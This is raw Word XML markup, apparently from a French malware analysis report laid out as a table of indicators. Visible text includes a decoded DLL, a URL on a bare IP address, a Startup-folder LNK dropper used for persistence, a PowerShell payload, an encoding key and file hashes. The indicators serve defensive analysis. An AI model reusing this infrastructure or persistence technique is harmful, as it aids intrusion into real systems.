            <wp:docPr id="47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7e3a6699cf42820b40dce9bf607601c74777f2c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50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3509033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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604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3509033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757292" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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707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3678185</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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d4134c826bc6bb1c3c6da9a19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809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4035690</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2100992" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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9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Main.dll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décodée depuis </w:t>
                        </w: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SNLk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912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4210315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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2f70b8b06120e086e65a334738e867fea2071dc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0144" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6555384</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4218328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113903" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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9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116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4218328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="260938" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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9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21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4306593</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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321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4385575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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https://142.111.194.73:86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424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4386845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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f447c9fcca8c62eec81d5df6d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526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4565280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1157576" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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757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40/dj5FZEiLnA/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628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4925718</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062363" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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3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Fichier LNK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déposé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731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5025655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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39dd1bd3bccc314d8933e5c41ed2ab084e4e20a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8336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5117688</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="607783" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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783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Startup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9360" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6555613</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5119393</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113675" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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6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038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5121298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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140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5202185</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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f569f77b7cf09abc5855b9483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243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5308230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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9276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U0asnHrRyNSI5H4.lnk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345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5678435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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2add9429d2822ae0c01c08bbd66c3a110ef2e9c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4480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5684108</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="362609" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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60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5504" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5158739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5685813</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1440995" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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9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65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5774713</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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755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5854965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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3a00cded1477657e9024e391e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857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5880758</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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0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6402335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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ad6071a44089df433f23a7dcd17fc4c49b67521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06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6409713</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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164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6409713</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757292" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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267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6578865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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d40f600bad875e2b1e312c8e0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369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7024635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062998" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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Powershell (</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve">StQ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, 92616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472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7109725</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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fcbeef11f392809cf96cceb94055f33b1f0fde9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574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7117103</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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676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7207273</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="454681" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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6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octets)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779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7286255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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4a4e3ee9223a01fcf55e9f0e0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881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7717178</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062998" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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0"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Charge utile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31"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> "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sub-encodée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"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984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7817115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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aa8a0dc974e090ae6f0a9cf90096646514b9c17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086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7824493</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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1888" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5272405</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7909148</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="427961" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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96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0xd2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291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7907920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="683663" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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366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30"/>
                            <w:spacing w:val="29"/>
                          </w:rPr>
                          <w:t xml:space="preserve">CiJL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clé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393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7993645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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8ec8119ec211df2cb106f681e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496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8363850</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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cb65f5873c72d707371ec56fb8ba501a5c7f594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5984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8369523</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="362609" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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609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7008" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5158739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8371228</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1440995" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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09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80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8460128</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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0905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8540380</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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0e9c5a2d28c9b379ce216900c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008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8566173</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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110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9087750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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f722ee8333f609e3589ec15acc3f000f99106a8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2128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9095128</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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315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9095128</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757292" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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417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9264280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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2d39260108ee4fe9c5e235cd2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520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8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622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8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724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8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827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8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929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8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12236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351155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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51155">
                          <a:moveTo>
                            <a:pt x="3670299" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="35115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51155"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="35115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596264" y="35115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5923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1342399</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="8218804"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="48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82188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8218804">
                          <a:moveTo>
                            <a:pt x="0" y="7937499"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7937499"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="8218804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8218804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7937499"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="7309485"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7309485"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7938134"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7938134"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7309485"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="7149465"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7149465"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7309485"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7309485"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7149465"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="7143114"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="7143114"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6619239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="6619239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="7143114"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="7143114"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="7143114"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6619239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="6619239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="7143114"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="7143114"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="7143114"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="6619239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="6619239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="7143114"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="6618604"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6618604"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6264910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="6264910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="6618604"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="6618604"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6618604"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6264910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="6264910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="6618604"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="6618604"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="6618604"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="6264910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="6264910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="6618604"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="6264274"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6264274"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5377179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="5377179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="6264274"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="6264274"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6264274"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5377179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="5377179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="6264274"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="6264274"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="6264274"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="5377179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="5377179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="6264274"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="5376544"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5376544"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4669789"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="4669789"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="5376544"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="5376544"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5376544"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4669789"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="4669789"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="5376544"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="5376544"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="5376544"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="4669789"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="4669789"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="5376544"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="4669155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4669155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3962400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="3962400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="4669155"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="4669155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4669155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3962400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="3962400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="4669155"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="4669155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="4669155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="3962400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3962400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="4669155"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="3961765"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3961765"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3255009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="3255009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="3961765"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="3961765"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3961765"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3255009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="3255009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="3961765"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="3961765"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="3961765"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="3255009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3255009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3961765"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="3254374"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3254374"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2692400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="2692400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="3254374"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="3254374"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3254374"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2692400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="2692400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="3254374"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="3254374"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="3254374"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="2692400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2692400"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3254374"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="2691764"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2691764"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2125979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="2125979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="2691764"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="2691764"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2691764"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2125979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="2125979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="2691764"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="2691764"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="2691764"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="2125979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2125979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2691764"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="2125345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2125345"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1601469"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="1601469"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="2125345"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="2125345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2125345"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1601469"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="1601469"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="2125345"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="2125345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="2125345"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="1601469"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1601469"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2125345"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="1600834"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1600834"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1247139"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="1247139"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="1600834"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="1600834"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1600834"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1247139"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="1247139"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="1600834"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1600834"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="1600834"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="1247139"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1247139"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1600834"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670934" y="1246504"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1246504"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670934" y="1246504"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="597535" y="1246504"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1246504"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="597535" y="1246504"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1246504"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596899" y="1246504"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596899" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="124650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6230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990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727065" cy="351155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
